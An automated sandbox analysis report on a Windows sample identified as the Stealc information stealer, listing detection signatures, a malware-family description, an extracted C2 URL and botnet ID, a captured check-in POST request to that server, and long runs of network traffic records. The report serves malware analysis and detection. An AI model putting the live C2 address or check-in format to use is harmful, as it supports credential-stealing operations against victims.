Windows Analysis Report
5rVhexjLCx.exe

Overview

General Information

Sample name: 5rVhexjLCx.exe
renamed because original name is a hash value
Original sample name: 0b1d171017be0462ff7522614f49afea.exe
Analysis ID: 1528264
MD5: 0b1d171017be0462ff7522614f49afea
SHA1: de5bea1d68ac834060d2b88c667761f6be6d5e3b
SHA256: 548617ec6305c654f71be990786ad737c3fce173e319c78f78d074589f72dbdc
Tags: 32exetrojan
Infos:

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Sigma detected: Silenttrinity Stager Msbuild Activity
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: 5rVhexjLCx.exe Avira: detected
Found malware configuration
Source: 0.2.5rVhexjLCx.exe.5adad8.2.raw.unpack Malware Configuration Extractor: StealC {"C2 url": "http://62.204.41.150/edd20096ecef326d.php", "Botnet": "default6_doz"}
Multi AV Scanner detection for submitted file
Source: 5rVhexjLCx.exe ReversingLabs: Detection: 31%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: 5rVhexjLCx.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: 5rVhexjLCx.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 13.107.253.45:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: 5rVhexjLCx.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_00599ABF FindFirstFileExW, 0_2_00599ABF

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 62.204.41.150:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://62.204.41.150/edd20096ecef326d.php
Detected non-DNS traffic on DNS port
Source: global traffic TCP traffic: 192.168.2.4:60240 -> 162.159.36.2:53
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHIECGCBKFHIEBGHDBKHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 49 45 43 47 43 42 4b 46 48 49 45 42 47 48 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 36 44 46 38 36 33 33 46 46 30 32 34 36 39 31 37 33 31 37 36 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 45 43 47 43 42 4b 46 48 49 45 42 47 48 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 64 6f 7a 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 45 43 47 43 42 4b 46 48 49 45 42 47 48 44 42 4b 2d 2d 0d 0a Data Ascii: ------DGHIECGCBKFHIEBGHDBKContent-Disposition: form-data; name="hwid"426DF8633FF02469173176------DGHIECGCBKFHIEBGHDBKContent-Disposition: form-data; name="build"default6_doz------DGHIECGCBKFHIEBGHDBK--
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknown TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00406280 InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 2_2_00406280
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache
Source: unknown HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHIECGCBKFHIEBGHDBKHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 49 45 43 47 43 42 4b 46 48 49 45 42 47 48 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 36 44 46 38 36 33 33 46 46 30 32 34 36 39 31 37 33 31 37 36 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 45 43 47 43 42 4b 46 48 49 45 42 47 48 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 64 6f 7a 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 45 43 47 43 42 4b 46 48 49 45 42 47 48 44 42 4b 2d 2d 0d 0a Data Ascii: ------DGHIECGCBKFHIEBGHDBKContent-Disposition: form-data; name="hwid"426DF8633FF02469173176------DGHIECGCBKFHIEBGHDBKContent-Disposition: form-data; name="build"default6_doz------DGHIECGCBKFHIEBGHDBK--
Source: MSBuild.exe, 00000002.00000002.1821798239.0000000001667000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150
Source: MSBuild.exe, 00000002.00000002.1821798239.00000000016B8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1821798239.0000000001667000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150/
Source: MSBuild.exe, 00000002.00000002.1821798239.0000000001667000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150/J
Source: MSBuild.exe, 00000002.00000002.1821798239.00000000016B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php
Source: MSBuild.exe, 00000002.00000002.1821798239.00000000016C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php0
Source: MSBuild.exe, 00000002.00000002.1821798239.00000000016B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpFd
Source: MSBuild.exe, 00000002.00000002.1821798239.00000000016B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpnd
Source: MSBuild.exe, 00000002.00000002.1821798239.0000000001667000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.150/n
Source: Amcache.hve.5.dr String found in binary or memory: http://upx.sf.net
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 60311 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60334 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60277 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60414 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60392 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60357 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60411
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60410
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60419
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60418
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60417
Source: unknown Network traffic detected: HTTP traffic on port 60437 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60416
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60415
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60414
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60413
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60412
Source: unknown Network traffic detected: HTTP traffic on port 60484 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60301
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60422
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60300
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60421
Source: unknown Network traffic detected: HTTP traffic on port 60369 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60420
Source: unknown Network traffic detected: HTTP traffic on port 60323 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60266 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60426 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60309
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60308
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60429
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60307
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60428
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60306
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60427
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60305
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60426
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60304
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60425
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60303
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60424
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60302
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60423
Source: unknown Network traffic detected: HTTP traffic on port 60495 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60460 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60242 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60312
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60433
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60311
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60432
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60310
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60431
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60430
Source: unknown Network traffic detected: HTTP traffic on port 60425 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60473 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60319
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60318
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60439
Source: unknown Network traffic detected: HTTP traffic on port 60255 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60317
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60438
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60316
Source: unknown Network traffic detected: HTTP traffic on port 60368 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60437
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60315
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60436
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60314
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60435
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60313
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60434
Source: unknown Network traffic detected: HTTP traffic on port 60496 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60310 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60335 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60253 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60278 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60448 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60391 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60323
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60444
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60322
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60321
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60442
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60320
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60441
Source: unknown Network traffic detected: HTTP traffic on port 60403 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60440
Source: unknown Network traffic detected: HTTP traffic on port 60289 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60459 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60329
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60328
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60449
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60327
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60448
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60326
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60447
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60325
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60446
Source: unknown Network traffic detected: HTTP traffic on port 60346 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60324
Source: unknown Network traffic detected: HTTP traffic on port 60380 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60445
Source: unknown Network traffic detected: HTTP traffic on port 60462 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60301 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60427 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60267 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60404 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60471 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60494 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60333 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60312 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60415 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60379 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60241 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60290 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60256 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60344 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60502
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60501
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60500
Source: unknown Network traffic detected: HTTP traffic on port 60416 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60279 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60390 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60378 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60449 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60483 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60322 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60291 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60450 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60345 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60409
Source: unknown Network traffic detected: HTTP traffic on port 60461 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60268 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60356 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60400
Source: unknown Network traffic detected: HTTP traffic on port 60300 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60408
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60407
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60406
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60405
Source: unknown Network traffic detected: HTTP traffic on port 60438 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60472 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60404
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 60367 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60403
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60402
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60401
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60260
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60381
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60380
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60372 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60257
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60378
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60499
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60256
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60377
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60498
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60255
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60376
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60497
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60254
Source: unknown Network traffic detected: HTTP traffic on port 60263 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60375
Source: unknown Network traffic detected: HTTP traffic on port 60395 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60496
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60253
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60374
Source: unknown Network traffic detected: HTTP traffic on port 60452 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60495
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60373
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60494
Source: unknown Network traffic detected: HTTP traffic on port 60286 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60372
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60493
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60250
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60371
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60492
Source: unknown Network traffic detected: HTTP traffic on port 60475 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60259
Source: unknown Network traffic detected: HTTP traffic on port 60498 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60258
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60379
Source: unknown Network traffic detected: HTTP traffic on port 60297 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60271
Source: unknown Network traffic detected: HTTP traffic on port 60245 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60392
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60391
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60270
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60390
Source: unknown Network traffic detected: HTTP traffic on port 60463 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60337 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60268
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60389
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60267
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60388
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60266
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60387
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60265
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60386
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60264
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60385
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60263
Source: unknown Network traffic detected: HTTP traffic on port 60302 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60384
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60262
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60383
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60261
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60382
Source: unknown Network traffic detected: HTTP traffic on port 60405 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60348 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60361 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60269
Source: unknown Network traffic detected: HTTP traffic on port 60275 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60502 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60313 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60298 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60282
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60281
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60280
Source: unknown Network traffic detected: HTTP traffic on port 60371 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60487 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60279
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60278
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60399
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60277
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60398
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60276
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60397
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60275
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60396
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60274
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60395
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60273
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60394
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60272
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60393
Source: unknown Network traffic detected: HTTP traffic on port 60406 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60349 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60439 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60326 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60360 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60383 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60417 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60440 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60293
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60292
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60291
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60290
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60289
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60288
Source: unknown Network traffic detected: HTTP traffic on port 60394 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60428 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60287
Source: unknown Network traffic detected: HTTP traffic on port 60264 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60286
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60285
Source: unknown Network traffic detected: HTTP traffic on port 60451 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60284
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60283
Source: unknown Network traffic detected: HTTP traffic on port 60476 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60418 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60485 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60244 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60315 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60334
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60455
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60333
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60454
Source: unknown Network traffic detected: HTTP traffic on port 60324 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60332
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60453
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60331
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60452
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60330
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60451
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60450
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60339
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60338
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60459
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60337
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60458
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60336
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60457
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60335
Source: unknown Network traffic detected: HTTP traffic on port 60347 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60456
Source: unknown Network traffic detected: HTTP traffic on port 60276 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60358 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60442 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60393 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60345
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60466
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60344
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60465
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60343
Source: unknown Network traffic detected: HTTP traffic on port 60453 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60464
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60342
